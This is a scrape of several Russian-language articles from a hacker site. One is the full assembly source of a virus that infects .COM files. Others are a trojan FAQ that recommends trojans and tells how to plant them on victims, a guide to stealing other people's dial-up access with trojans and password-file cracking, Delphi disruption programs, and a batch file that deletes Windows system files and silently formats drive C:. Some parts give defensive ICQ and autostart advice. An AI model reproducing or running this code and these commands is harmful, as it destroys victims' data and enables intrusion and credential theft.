процедура, ID устройства, порядок инициализации, обработчик V86 API,
обработчик прот-модного API

Ебится седце перестало.. На первый взгляд это выглядит страшновато, но
позвольте мне написать пример, который изменит это первое впечатление. Мы
обьявим VxD с именем ViRuS, который будет версией 1.0 нашего вируса.

Declare_Virtual_Device ViRuS,1,0,VxD_Control,Undefined_Device_ID,,,

Как видите, я не испрользовал последние параметры, потому как нам (пока?) не
интересно предоставлять API для других программ, или использовать Читать далее...

Вирус заражающий com программы


Небольшой вирус заражающие com программы
Маленький (или большой) вирус, заражающий .COM-программы
при запуске, если у них нету вначале JMP.
Проверки на всякие всячности не присутствуют.



.model tiny
.code
org 0100h
start:
jmp virusstart ; Переход на вирус:
mov ah,09h ; также, как будет
int 21h ; с жертвой при
mov ax,4C00h ; заражении
int 21h
Message db 'This is little infection... He-he...',13,10,'$'
; До сих пор нормальный
; код жертвы

virusstart: ; А это вирус
pushf
push ax ; Сохраняем все, что
push bx ; только можно...
push cx
push dx
push ds ; Не знаю, насколько
push es ; это правильно...
push si
call SelfPoint
SelfPoint: ; Определяем точку
pop si ; входа

cld ; Движемся вправо
push cs ; Поставим сегментные
pop ds ; регистры назначения
push cs ; и отправления
pop es
mov di,0100h ; В приемнике - 0100h,
push si ; начало программы
add si,original-SelfPoint ; Сейчас SI указывает на
mov cx,3 ; оригинальные байты
rep movsb ; Скопируем их в начало
pop si ; зараженной программы

mov ah,1Ah ; Поставим собственную
mov dx,si ; DTA из конца вируса
add dx,VirusDTA-SelfPoint ; 21h прерыванием
int 21h

mov ah,4Eh ; Делаем FindFirst
mov dx,si ; с соответствующей
add dx,FileMask-SelfPoint ; маской
mov cx,32 ; и атрибутом чтение/
int 21h ; запись, чтобы не
; мудрить
jnc RepeatOpen ; Ошибок нет - открываем

jmp OutVirus ; Низко пошел...

RepeatOpen:
mov ax,3D02h ; Откроем файл
mov dx,si ; при помощи расширенного
add dx,NameF-SelfPoint ; управления оным
int 21h
jc OutVirus ; При всех ошибках выходим

mov bx,ax ; Возьмем номер файла,
; и будем держаться за BX

mov ah,3Fh ; Считываем настоящие
mov dx,si ; команды для
add dx,Original-SelfPoint ; исполнения
mov cx,3 ; Пусть будет три байта
int 21h
jc OutVirus ; Опять проверим на ошибку...
push bx
mov bx,dx
cmp byte ptr [bx],'щ' ; Вдруг в этом файле
pop bx ; тоже сначала переход?
;
je CloseNotInfect ; Тогда не заражать!
; Ох, лень мне поточнее
; проверять...

mov ax,4202h ; Прыгаем в конец
xor cx,cx ; жертвы (изнасилования)
xor dx,dx
int 21h ; Теперь в AX лежит
jc OutVirus ; адрес начала
; вируса, если нет,
; конечно, ошибки
push ax

mov ah,40h ; Запишем
mov dx,si ; тело вируса
sub dx,SelfPoint-VirusStart ; в файл-жертву
mov cx,VirusEnd-VirusStart ; Количество байт
int 21h

pop ax
jc OutVirus ; Может случиться ошибка -
; диск, там, переполнен...

sub ax,3 ; Вычитаем 3 - чтобы
push bx ; попасть Куда Надо
mov bx,si
sub bx,SelfPoint-VirusStart
mov word ptr cs:[bx+1],ax ; Кладем адрес
mov byte ptr [bx],'щ' ; Команда перехода (в
; пределах сегмента)
pop bx

mov ax,4200h ; А теперь в начало
xor cx,cx ; жертвы
xor dx,dx
int 21h
jc OutVirus ; Проверка на ошибку

mov ah,40h ; И запишем туда
mov dx,si ; команду перехода
sub dx,SelfPoint-VirusStart ; на наше гнусное
mov cx,3 ; тело
int 21h
jc OutVirus ; Опять проверим ошибки

mov ah,3Eh ; Файл надо закрыть
int 21h ; (Он уже заражен -
jmp OutVirus ; больше не работаем)

CloseNotInfect:
mov ah,3Eh ; Закрываем неподходящий
int 21h ; файл

mov dx,si
add dx,FileMask-SelfPoint ; И делаем FindNext
mov ah,4Fh
int 21h
jc OutVirus ; Ошибка - значит, не судьба
jmp RepeatOpen ; Или переход на открытие

OutVirus:
pop si ; И, конечно же,
pop es ; все на свете
pop ds ; восстановить
pop dx
pop cx
pop bx
pop ax
popf
mov si,0100h ; Заносим в стек адрес
push si ; начала программы
ret ; и делаем RET

; Наши данные:

VirusDTA db 30 dup (0) ; Это DTA
NameF db 13 dup (0) ; Тут будет имя файла
FileMask db '*.cOm',(0) ; Вот такая красивая
; маска
original:
mov dx,offset Message ; А это оригинальные байты
VirusEnd: ; из жертвы (Лозинский,
; не зевай!)
end start





автор: RealNeo

Copyright © "HACK-INFO" "admin@hack-info.org"
При использовании материалов обязательна ссылка на http://hack-info.org.

Трояны: Вопросы и ответы


Вот сижу я (RealNeo) на канале(irc server: dal.net.ru chanel: #XakepSite port:6667) и каждый раз кто нить зайдет и че нить спросит про троян...

Что такое троян?
Это программа, которая как правило выдает себя за что-нибудь мирное и полезное (взломщик инета =)). Нас интересуют интернет-трояны которые либо дают доступ к компьютеру с другого компа без ведома пользователя, либо высылают по определенному адресу какую-либо информацию с компьютера-жертвы (как правило пароли)

Что может сделать человек, проникнув в чужой компьютер?
Все чего захочет: начиная простыми шутками (выдвинуть CD-ROM, передвинуть мышь, послать сообщение), заканчивая кражей файлов и деструктивными действиями (удаление файлов, их изменение, форматирование диска и т.д.)

Как троян проникает в компьютер?
Начнем с того, что он попадает туда по глупости самой жертвы. Самый популярный вариант - получение трояна по почте (например письмо от Microsoft с новой прогой, которая бесплатно фиксит все баги и защищает от всех троянов и т.д.), либо по аське (ну всем хоца на мои фотки глянуть - а там ехе-шный архив =)) или еще можно скачать трояна с какого-нибудь даунлод сайта (или хакерского сайта под видом взломщика инета).

А что Microsoft рассылает троянов?
Майкрософт ничего никогда не рассылает (тем более нерегистреным пользователям), посмотрите на обратный адрес письма и скорее всего Вы увидите чего-то типа microsoft@usa.net вот Вам и ответ: у микрософта мыло оканчивается на @microsoft.com а дальше думайте сами...

Как понять что троян установлен на компьютере?
1) Ну по внешним проявлениям узнать это можно далеко не всегда. Но иногда можно заметить неправильное поведение компа: сам по себе открывается CD-ROM, выскакивают окна с разными сообщениями (типа иди на @#$), прыгает курсор мыши, начинает проигрываться музыка и т.д.

2) Если это мыльный троян, то соответственно никаких вышеперечисленных действий он не выполняет, это значит что заметить его присутствие в системе уже не так просто. Чтобы узнать есть ли увас троян, вы можете глянуть всё, что запускается у вас на компютере при загрузке винды. Для этого зайдите в ПУСК, ВЫПОЛНИТЬ, наберите там msconfig, в поле Автозагрузка ищите что либо подозрительное c *.exe расширением, к примеру троян GIP прописывается там как Welcome и Sevice с путём месторасположения C:\windows\update.exeили C:\windows\system\update.exe.

А как узнать поточнее?
Можно конечно запустить антивирус, но он не все находит , а можно посмотреть в реестр, ини-шные файлы, директорию автозапуска и заодно глянуть на список процессов (Task Manager).

А где в реестре можно посмотреть?
Вот где находится автозапуск в реестре:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

А что за ini-файлы?
Win.ini строки run=; и load=

А вот я нашел файл трояна в моей директории виндоуз, а он стираться не хочет!
Сначала надо удалить запись в реестре, указывающую на него, затем перезагрузить комп, а уж затем спокойно удалять этот файл.

А какой троян вы можете посоветовать?
Ну самый лучший и самый извесный это конечно же Lamers Dead(Смерть Ламера), также не плохой троян gi, вообщем плохих троянов нету есть только хорошо работающие и очень хорошо работающие трояны.

А где можно их скачать?
Да на любом хак сайте.

Я скатал троян Lamers Dead (Смерть Ламера), но вводя ip он не подключаеться к удаленому компьютеру что делать?
Ты сначало должен настроить сервер, потом отослать ему сервер на почту или засадить насильно в компьютер. Дальше он будет без проблем подключаться.

Мне начали приходить репорты трояна на мою почту, но там нету пароля, есть только логин, что это значит?
Значит тот кому ты засадил троян не сохраняет пароли на свой диалап.



автор: Mc PaulMaster & RealNeo

Вирусы, черви и трояны


В этой статье будут описаны следующие трояны, вирусы и черви:

Hybris, MTX, Wscript.KakWorm, NetMonitor,GirlFriend, Acid Shiver, Deep Throat 1.0, Deep Throat 2.0

Ну троянов очень много так не будем их всех описывать, список всех известных троянов в мире можно посмотреть здесь

Hybris

Довольно сложный и неплохо написанный троян. Обычно попадает в системы стандартным способом – приходит прикрепленным к письму со стандартным содержанием на тему порнокартинок. После запуска троян заражает файл WSOCK32.DLL, который собственно и отвечает за работу в сети (Интернете). Троян записывает себя в конец файла и заменяет точку входа DLL-библиотеки на свой код и при этом шифрует "настоящую" стартовую процедуру файла.

Червь перехватывает функции "connect", "recv", "send", сканирует принимаемые и отправляемые данные, ищет в них адреса электронной почты и через некоторое время отправляет свои копии по этим адресам.

Вирус имеет возможность подключения дополнительных программ – плагинов, которые он самостоятельно скачивает из Интернета со страницы http://pleiku.vietmedia.com/bye/, что делает возможности создателя трояна безграничными. Работоспособен на всех Win32-платформах.

Защита: распознается последней версией AVP.

MTX

Довольно сложный по структуре троян. Состоит из трех частей – вирус, червь, троянец-backdoor. Вирус отвечает за заражение -exe файлов по технологии "Entry Point Obscuring". Вирус записывается не в точку входа заражаемого файла, а в любое произвольное место. Затем ищется подходящая процедура в теле программы и переписывается так, что вирус, понаделав пакостей, возвращает управление программе. Таким образом вирус фактически начинает работать не при запуске зараженной программы, а при выполнении определенной процедуры. Сам код вируса содержит в себе и червя, и троянца в запакованном виде. Другими словами, зараженный файл перенесет на другой компьютер полный набор радостей.

Собственно червь занимается “рекламой” и распространением вируса-трояна. Он также как и предыдущий троян заражает WSOCK32.DLL и распространяется, используя перехваченные почтовые адреса. В то же время он блокирует посылку любых писем на адреса антивирусных компаний и посещение их Web-сайтов. Ну, а троян-backdoor занимается тем, что скачивает программы с определенного сервера, что позволяет загрузить на зараженный компьютер все что угодно: закачать троян или какой-либо злобный вирус. Работает на Win32-платформе.

Защита: распознается последней версией AVP.

WScript.KakWorm

Этот червь написан на языке Java Script, для распространения использует MS Outlook Express.

Червь приходит на компьютер в виде письма в HTML-формате. В письме содержится троян, в виде программы, написанной на языке JavaScript. При открытии или предварительном просмотре сообщения скрипт-программа не видна, т.к. скрипты никогда не отображаются в HTML-документах (сообщениях, страницах и т.п.), но получает управление - и червь активизируется. Червь создает в системном каталоге Windows файл, имя которого зависит от настроек системы. Расширение файла – HTA. Также создается файл “KAK.HTM” – html-копия трояна.

Для справки: HTA-файл (HTML Application) - тип файлов, появившийся в MS Internet Explorer 5.0. HTA-файлы содержат обычный HTML-текст и скрипт-программы, но при запуске не вызывают оболочку Internet Explorer, а выполняются как отдельные приложения. Это дает возможность разрабатывать приложения (и вирусы), используя скрипт-программы.

Скрипт червя меняет разделы реестра, относящиеся к MS Outlook Express, - меняется ключ "подпись по умолчанию". Червь записывает туда ссылку на файл "KAK.HTM".

В дальнейшем все письма, которые имеют формат HTML (это стандартный формат MS Outlook Express), будут автоматически дополняться подписью, содержащей код червя. Outlook Express каждый раз при создании нового сообщения автоматически добавляет в него содержимое файла "KAK.HTM", т.е. скрипт-программу червя, а значит, все отправляемые сообщения оказываются зараженными. Письма, имеющие формат RTF или "Plain text", не заражаются (и не могут быть заражены). Одновременно червь заражает систему так, чтобы при каждой загрузке он активизировался - на тот случай, если пользователь заменит подпись по умолчанию.

Защита.
Сложности с этим трояном заключаются в том, что сканирование дисков на наличие вирусов бесполезно, так как при повторном прочтении письма система вновь заражается. Выход только один – установка антивирусного монитора. Однако это спасает только в момент записи трояна на диск, но не при чтении письма (и, соответственно, выполнении текста трояна).

Самый лучший выход – установка монитора скриптов, например “AVP Script Checker”.

И еще. Для записи своих файлов на диск червь использует бред в защите Internet Explorer 5.0. Компания Microsoft выпустила дополнение, которое устраняет этот бред: http://support.microsoft.com/support/ kb/articles/Q240/3/08.ASP.

NetMonitor

Этот троян состоит из Читать далее...

Максимальная безопасность в ICQ


Наверняка вы давно пользуетесь программой ICQ, и наверняка у вас уже много раз воровали ваши красивые уины , вот, вы опять же себе достаете 6 значку, и такую красивую, что хочется, что бы она от вас не куда не убежала %) Сегодня я расскажу как можно оптимально, без вреда себе настроить/использовать вашу ICQ на безопасную работу.
1) Желательно, некогда не ставьте пароли типа vasili, qwerty, max, ping, и прочие, которые давно заезженны всеми вся . Так как после двух минут брут- форса недоброжелателя, сразу же открывается пароль!
2) Некогда не кого не активизируйте! Не пропускайте к себе в контакт лист , эта мера необходима для того, что бы не кто не смог видеть ваш IP, ну это уже крайняя мера, так что, кому не нравится, не слушайте меня.
3) Не переходите по ссылкам которые вам дают незнакоме люди. Да еще если она такая замудрённая, вроде http://www.xakep.shmaker.kaker.ru.net/net/pass/?get=pass&dat=
c:/program%20file/icq/%any%20dir%/*.dat&icq=355167mail=
vasili@xakep.shmaker.kaker.ru.net
4) Не подключайте не какие хакерские модули для своей аськи, вроде таких, что открывают IP разговаривающего.
5) Не используйте программы, которые, допустим по уину определяют IP, или по юину закрывают аську. Так как эти программы наверняка ваш пароль дублируют на майл создателя программы. Много я таких умников видел.
6) НЕКОГДА не сохраняйте свой пароль от ICQ юина. Так как за две секунды к вам в компьютер может проникнуть хакер и стащить ваши dat файлы, в которых хранятся ваши дрогоценные пароли.
7) Не подключайте к своей аське такие программы как mICQ, о них двано всё известно %).
8) Не добавляйте к своей асе более чем 2 уина, т.к. можете забыть полностью о безопасности. Проверенно.
9) Дополнение к пункту 1 : ставьте пароли, которые вы точно знаете, что не в каком словаре для брут-форса нету, вроде 1bjdbFvz . Тогда это будет верхом безопасности.
10) Не ставьте себе Primary eMail, не свой, ОБЯЗАТЕЛЬНО там должен стоять ваш НАСТОЯЩИЙ, так как злоумышленник может , или , взломать этот не ваш майл, или просто пройти и зарегистрировать его. Зачем?! Да для того, что бы вспомнить на него пароль от вашего юина с сайтa icq.com !
Ну а теперь давайте рассмотрим наиболее безопасные установки для вашей программы ICQ. Заходим в меню , там у вас написанно - ICQ. Выбираем Security & Privacy и идём по закладкам.

Закладка General : В ней основанна вообщем почти вся безопасность.
Contact List Authorization , в этом столбце ОБЯЗАТЕЛЬНО выбираем "My Authorization is Required before users add me to their Contacl List" .
Ниже таблица Security Level, в нём не чего особенного нету, так что проедим его.
Таблица Web aware , в нём выбирается, показывать ли ваш статус на страницах, или нет, если не хотите что бы он был показан, то уберите галочку с "Allow others to view my online/offline status from the web", ну мне лично как то всё равно.
Закладка Password : На этой закладке вы сможете сменить ваш пароль, два раза пишите желаемый новый пароль, кликаете Save, вылетает окошко, с запросом старого пароля , вводите , жмёте на ОК, и всё, установлен новый пароль.

Закладка Direct Conection : Очень умная и хорошая закладка, на ней можно выбрать, какой будет с кем соединение по аське . Желательно выбрать "Direct Connection with user listed in your contact List". Рекомендуется.

Закладка Ignore : Вот, добрались до главного, давайте поближе ознакомимся с этой закладкой. Можно запрещать по юину юзеров, будишь их просто игнорировать.
"Accept messages only from users on my Contact List" , класс, выбираем её, т.е. если поставите галочку, то вы будите принимать сообщения, только от тех, кто есть в вашем контакт листе !
А в Do not accept multi-Receipient Messeges from ... , вы сможете выбирать так, что у вас не будут приниматься сообщения для многих юзеров, от всех тех кто у вас не в контакт листе.
Do not accept WWPager Messeges , да да, ОБЯЗАТЕЛЬНО ставим галочку напротив этих слов. т.е. если установили её, то не будите принимать всякие мессаги с WWWPager'ов, обязательно, потому что это самый распространнённый вид флуда на аськи, я сам этим когда то занимался =)
Do Not accept EmailExpress Messeges , апсолютно аналогичная ситуация. только называется не WWWPager, а EmailExpress, тоже бывает, что и через неё флудят, ставим напротив неё галочку.
Do not allow Direct Conection with previous (less secury) ICQ software , если включите эту функцию, то не будите напрямую соединятся с пользователями асек , ранних версий. Так вот, если включите, то повысите скорость, повысите свою и системную безопасность, так как в других аськах много очень глюков. Лично я не стал выбирать её, так как много пользователей еще сидит под 2000 асями, и соединятся я смогу с отправлением файлов, что при случае этой функции включенной - будет невозможно . Ну вообщем вам выбирать!

Закладка Words List : Ну, анти-мат, он и в африке - анти-мат %) Сможете добавить слова, который ICQ будет заменять на Читать далее...

Западло на Делфи


В этой статье вы найдете для себя или своего будущего трояна, проги новые функции. в конце самой статьи есть исходный текст проги, которая не позволит кнопочкам CTRL+ALT+DELET снять ваш прикол (западло) ну начнем...

Западло на Delphi №1
Я юзал Delphi 5 но думаю он пойдет и на 3,4,6. Для начала запусти Дельфи там жми на File --> New Application(После этой операции создается приложение). Далее тыкни на Project --> View Source. Терь стирай там все и вводи этот бред:

program netmesta; /*Типа название проги*/
uses Windows;
var
text:TextFile;
alphabet, temp:string;
i:integer;
point:Tpoint; /* Объявление переменных */
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL';
begin
RegisterServiceProcess(0,1);
alphabet:='abcdefghijklmnopqrstucvwxyz'; /*заполняем строку алфавитом*/
while true do
begin
GetCursorPos(point); /* получаем координаты курсора */
if (point.x = 0)and(point.y = 0) then /* если х = 0 и y = 0 то */
begin
temp:=''; /*очищаем буфер*/
for i:=1 to 8 do /*генерируем случайное имя файла*/
temp:=Concat(temp, alphabet[Random(length(alphabet)-1)+1]);
temp:=Concat(temp, '.');
for i:=1 to 3 do /*генерируем случайное расширение*/
temp:=Concat(temp, alphabet[Random(length(alphabet)-1)+1]);
Assign(text, temp); /* присваиваем имя файлу */
Rewrite(text); /*открываем файл*/
for i:=1 to 30000000 do
begin
Yield;
Write(text, '!'); /* наполняем файл мусором */
end;
Close(text); /* закрываем файл */
end;
end; /* всё сначала */
end.

Вот и все это западло засоряет винт мусором в общем остается мало места =)

Западло №2 (Светамузыка с Num Lock, Caps Lock, Scroll Lock) Запусти Дельфи, выбери в меню Project--> View Source и набери еще один бред:

program svetmusic; /*название проги*/
uses Windows; /* подключаем необходимые модули */
var
ks:TKeyboardState; /* объявляем переменную состояния клавиатуры */
i:integer; /* объявляем целочисленную переменную */

procedure

begin
while true do
begin
Yield;
Sleep(3*60*1000);
GetKeyboardState(ks); /* получаем состояние клавиатуры */
i:=Random(2);
case i of
0:KS[020] := KS[020] XOR 1;
1:KS[144] := KS[144] XOR 1;
2:KS[145] := KS[145] XOR 1;
end;
SetKeyboardState(ks);
end;
end.
Ну вот и все теперь нужно откомпилировать это нажимаем Ctrl+F9

Западло №3
Снова запускаем Делфи выбери в меню Project --> Viev Source и води новый бред =):

program menu;
uses Windows;
var
Wnd:THandle; /* объявляем переменные */
int:integer;
begin
Randomize; /* холостой прогон генератора случайных чисел */
int:=(Random(3)); /* выбор одного варианта из четырёх */
case int of
0: /* если первый вариант то */
begin
Wnd := FindWindow('Progman', nil); /* прячем трей */
Wnd := FindWindowEx(Wnd, HWND(0),'ShellDll_DefView', nil);
ShowWindow(Wnd, SW_HIde);
end;
1: /* если второй вариант то */
begin
Wnd := FindWindow('Shell_TrayWnd', nil);
Wnd := FindWindowEx(Wnd, HWND(0),'TrayNotifyWnd', nil);
Wnd := FindWindowEx(Wnd, HWND(0),'TrayClockWClass', nil);
/* прячем часы */
ShowWindow(Wnd, SW_HIde);
end;
2:
begin
Wnd := FindWindow('Shell_TrayWnd', nil);
Wnd := FindWindowEx(Wnd, HWND(0),'Button', nil);
/*прячем кнопку "Пуск"*/
ShowWindow(Wnd, SW_HIde);
end;
3:
begin
Wnd := FindWindow('Shell_TrayWnd', nil);
Wnd := FindWindowEx(Wnd, HWND(0),'TrayNotifyWnd', nil);
/* прячем "Панель задач" */
ShowWindow(Wnd, SW_HIDe);
end;
end;
end.

Это западло прячет часы с кнопкой "Пуск" и, на худой конец "Панель задач".
Исходные текста by Kiron56

А если вы хотите чтобы ваши заподлянки не могли снять через Ctrl+Alt+Delet то делаем следующее. Открываем Делфи блин бесит все повторно писать вы уже наизусть выучили что там открывать надо наверно =)... и вводим теперь мой бред:
program AntiCTRLALTDELETE; /*Название проги*/
uses Windows, Graphics; /* подключаем модули */
var
desk:TCanvas; /* объявляем переменные */
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL';
begin
RegisterServiceProcess(GetCurrentProcessID, 1);
desk:=TCanvas.Create; /* инициализируем переменную */
desk.handle:=GetDC(0); /* получаем заголовок десктопа */
while true do
begin
Yield;
desk.Pixels[Random(800), Random(600)]=0; /* точка на экране становится черной */
end;
end.

Ну вот и все теперь ваши заподлянки не снимут даже три веселые кнопочки =)

автор: RealNeo

IP адрес: Определение, сокрытие, последствия

Как известно, Internet основана на семействе протоколов tcp/ip, определяющих, каким образом осуществляется взаимодействие между подключенными к сети компьютерами. Идентификация этих компьютеров осуществляется с помощью так называемых IP-адресов, каждый из которых представляет собой уникальный 32-битный идентификатор, обычно записываемый в виде четырех десятичных чисел например, 192.168.0.1. И с точки зрения адресации сервер, обрабатывающий ежесекундно тысячи запросов практически ничем не отличается от вашего компьютера, подключаемого к сети по dial-up. Единственная разница - домашний пользователь, как правило, получает так называемый динамический ip-адрес, меняющийся от подключения к подключению.В то время как адрес сервера должен быть доступен всем клиентам, желающим воспользоваться его услугами, клиент вовсе не обязан афишировать свой адрес на каждом углу. Более того, обнародование ip-адреса может привести к весьма серьезным последствиям. Что можно сделать с человеком, зная его ip-адрес ? Ну, например, если на его машине с Windows'9x живет NetBIOS over IP, и разделены для доступа по сети, да еще и без паролей, некоторые диски, то довольно много :) (для заинтересовавшихся - помочь здесь могут nbtstat, lmhosts и net use). Правда это не слишком часто встречается у dial-up пользователей. Другой пример - в прошлом году были найдены дыры в IE и NN, позволяющие получить доступ к файлам клиента. Дырки те, правда, уже прикрыли, но кто знает, сколько их еще осталось. До сих пор пользуются популярностью в определенных кругах программы, объединяемые общим названием (восходящего к первой программе этого класса - Winnuke), которые осуществляют атаки типа Denial of Service, приводящие к зависанию или отключению от сети атакуемого компьютера.Нежно любимая миллионами пользователей ICQ (http://www.icq.com) тоже оказалась не без греха. На странице Fyodor's Exploit world (http://www.dhp.com/~fyodor/sploits.html) помимо прочего приведена информация о слабостях ICQ-шного протокола (http://www.dhp.com/~fyodor/sploits/icq.spoof.overflow.seq.html) которые уже позволили создать многочисленные программы, делающие жизнь пользователя ICQ не слишком пресной.
Так, например, на странице ICQ Snoofer Team (http://const.ricor.ru/~icq/) предлагается опробовать программу, позволяющую слать сообщения по ICQ с чужого UIN. Snoofer существует в двух вариантах - в виде скрипта, доступного со страницы, и в виде программы, которую обещают рассылать по почте. Для его использования достаточно знать ip-адрес адресата, номер порта, на котором висит ICQ, и UIN отправителя. Инструкция прилагается. Впрочем, все эти веселые программы пригодны в основном для деструктивной деятельности, особого смысла в которой я не вижу (кстати, запущенное на нашем сервере голосование по поводу "нюков" показало, что большинство посетителей со мной солидарно).Посмотрим, какие действия можно предпринять для определения и скрытия ip-адреса.Абсолютных рецептов конечно не существует, можно говорить лишь о наиболее распространенных случаях. Вообще говоря, ваш IP-адрес может засветиться в огромном количестве мест. Другое дело - как его потом оттуда вытащить. Скажем, ваш любимый браузер при заходе на любую страницу сообщает о себе достаточно много информации. В качестве простой демонстрации приведу скрипт на Perl'е, выводящий основную информацию о посетителе страницы:

Листинг 1.
showuser.pl#!/usr/bin/perl
print ("Content-type: text/html\n\n");
@ee=(
"CHARSET",
"HTTP_USER_AGENT",
"HTTP_REFERER",
"REMOTE_ADDR",
"REMOTE_HOST"
);
foreach $e(@ee)
{
print "$e: $ENV{$e}
\n";
}
Вообще-то это самый безобидный случай обнародования ip-адреса (разве что если допустить злой умысел веб-мастера, установившего скрипт, атакующий посетителя, но вероятность целенаправленной атаки ничтожно мала).IP-адрес отправителя можно вытащить из заголовка полученной электронной почты (Скорее всего, он будет лежать в последнем поле Received:, в отличие от поля From: его подделать чуть сложнее). Если у вас динамически выделяемый адрес, то подобная ситуация не слишком опасна. Хуже, если адрес постоянный, что, правда, встречается пореже.Самыми опасными с точки зрения обнародования ip-адреса оказываются всевозможные системы для интерактивного общения - IRC (командой /whois), InternetPhone, ICQ и т.д. Справедливости ради надо заметить, что некоторые из них пытаются прикрыть адрес пользователя (скажем, в MS Comic Chat показывается только часть адреса, в ICQ'98 появилась возможность скрытия своего адреса, не слишком правда хорошо работающая при общении со старыми версиями), но в большинстве систем адрес лежит совершенно открыто. Что же касается html-чатов, здесь все зависит от желания разработчика, принципиальная возможность показа ip-адреса существует, как это было продемонстрировано чуть выше. Идея следующая: если в чате разрешен ввод тегов html, никто не помешает вставить в свое сообщение Читать далее...

Достаём халявный инет


Дарова Хакеры =) Я хочу рассказать как можно достать халявный инет наверно самым простым способом!

Нам понядобиться: примерно хороший сканер типа EssNetTools 2.2 который у нас есть, Gip1131 или Смерть Ламера 2.6, PwlTool6.1 и нюк который посылает IGMP пакеты и перезагружает комп.
И так начнем первое.
Что вам надо сделать это насканить пилов, Потом заходим к ним в паку Windows
ищем там pwl файлы, находим копируем себе на винт и расшифровываем при помощи pwltool6.1, но а там пусто! что делать? ...но если вам нужен его инет то нет проблем. Дальше идем в папку Автозагрузка например C:\Windows\Главное меню\Программы\Автозагрузка\) туда сажаем уже сконфигурированный сервер GipTrojan (надеюсь это вы в состоянии сделать?) или Смерть Ламера, также в настройках сервера трояна лучше поставить галочку, напротив "destroy trojan body", эта фича удаляет сервер трояна с компа, зачем?....затем если лам что-то и заподозрит то в "атозагрузке" у него трояна уже не будет.
И после его первой перезагрузки троян активизируются=) (но если вам не терпится узнать его пароль на инет, тогда можно попробовать нюкнуть лама к примеру "Doom'oм" тогда после перезагрузки он опять зайдет в инет, а там троян все сделает уже сам ...) Я советую кидать Смерть Ламера хотя он много весит (~260 кб), но
можно подождать =), но вы скажете зачем ждать? сервер gip'a то весит всего 21кб! его легко кинуть, но это решать вам. Смерть Ламера очень мощный троян удалённого управления, можно делать практически всё с его компом! =) с помощью этой проги вы можете реально потрещать над теми типами , которым вы посадили этот троян =).



Ну вот и все! способ проверенный =).

P.S. ищите компы без антивирусов, смотрите в корневой папке Windows файлы типа:Drweb32.dll, avpmonitor.dll (примерно такие) зачем наверно вы поймете сами =). И в основном у всяких фирм открыт полный доступ к их ресурсам! так что
желаю удачи.


автор : RealNeo

Bat файл за несколько секунд!
автор: Dan





Данная статья, основана на статье Crypt'a "Строим Eraser за 5 минут!".
Давно хотел написать статью про bat файлы да руки не доходили, вот все - таки собрался и запустил Word. Начну наверное как и все с нудной истории, это даже и не история, в общем судить Вам.


Не секрет, что мне сейчас 16 лет (я 1985 года рождения). Учусь в Юридическом Техникуме на программера, так как я пошел в технарь с 9 класса, то на первом курсе идет школьная программа за два года в школе. Я Вам хочу скзать, что ЛАМАЗОВ просто пруд пруди, со мной учится в группе моя бывшая одноклассница, которая на первых парах информатики пальцы гнула, что она кул юзер, пришлось её быстро на место поставить, и что Вы думаете, она сейчас с остальными ламаками которые на клаве Enter найти не могут, юзает по досу, а я в это время уже экзамен сдал по информатике и в Форточках в игры играю!).
Так вот к чему я все это написал? А к тому, что многие или не знают или забыли простенький ДОС. А зря… Еще в школе я познакомился с ДОСом, и не жалею, ведь с помощью ДОСовских команд на удаленном кампе можно сделать очень много нехорошего! Хе-хе! Представьте, если Вы башковиты русский парень, то в школе начинают готовить к азам хака!).

Так, что же могут сделать эти маленькие bat файлы и как их сделать. Для тех кто хоть капельку имеет представление о ДОСовских командах будет все проще. Я же со своей стороны постараюсь объяснить каждую строчку.


Начнем.
Для написания нам понадобится любимая прога программеров Windows Commander (почему любимая? Да потому что с ее помощью с файлами можно творить все что угодно начиная с распаковки и кончая изменением расширением файла).
1. Запускаем ее.
2. Нажимаем Shift+F4, пишем любое название файла(install.bat), главное чтобы Вы поставили расширение *.bat.
Если Вы сделали все правильно, то должен открыться блокнот. Теперь пишим в нем команды которые батик будет выполнять на чужом кампе, помните все команды он делает последователь.
Грохаем windows на кампе жертвы:
Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл
Cd C: -команда перехода на диск C где почти у всех кампах стоит виндовс
Сd windows -переходим в папку Windows (у 95% ламеров и юзеров папка называется именно так)
Большой минус бат файлов да и ДОСа в частности это то что нельзя удалять сразу папку с файлами, а нужно заходить в каждую папку отдельно и удалять там файлы.!!!
del *.exe -удаяем все файлы с расширением .exe
del *.ini -удаяем все файлы с расширением .ini
del *.com -удаяем все файлы с расширением .com
cd\
cd windows
cd system
del *.dll
del *.exe
После этих простеньких строчек у юзера или ламера будет примерно 30 минут работы!)
Код полностью:
Cd\
Cd C:
Сd windows
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe
Ну что? Все написали? Теперь закрываем блокнот и видим, что создался файл install.bat. Я Вам не рекомендую его запускать у себя!)
Но вдруг папка виндовс называется не windows а например winMe, да без проблем, просто надо будет после этого кода написать ниже ещё один только чтобы папка называлась winMe и так далее.
Например:
Cd\
Cd C:
Сd windows
Del *.exe
Del *.ini
Del *.com
Cd\
Cd windows
Cd system
Del *.dll
Del *.exe
Cd\
Cd C:
Сd winMe
Del *.exe
Del *.ini
Del *.com
Cd\
Cd win98
Cd system
Del *.dll
Del *.exe
и так далее! Как вы понимаете таким образом можно грохнуть все что угодно на чужом винте! Только помните, что такое можно делать если на машине жертвы стоит
Windows 9Х!!!
Люблю прикалывать ламеров, это форматирование диска С:\
Форматируем диск С:\
Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл
Format C:\ -команда форматирования диска
С:\ Y -команда автоматического согласие форматирование диска без ведома или подтверждения команды ламером
Y -тоже самое
Y -уже говорил
Хе! Вот и все…
Код полностью:
Cd\
Format C:\
Y
Y
Y

Единственный минус! Такой код может не сработать если на кампе стоит Windows ME или XP! Придется писать другой путь.
В этих форточках команда форматирования лежит не просто в папке Windows, а по следующему пути C:\WINDOWS\COMMAND\format c:, но само сабой форматироваться не будет, а потребует потверждение и простая команда
у
у
у

не поможет, нужена другая. Просто добавим параметр /autotest

C:\WINDOWS\COMMAND\format c: /autotest

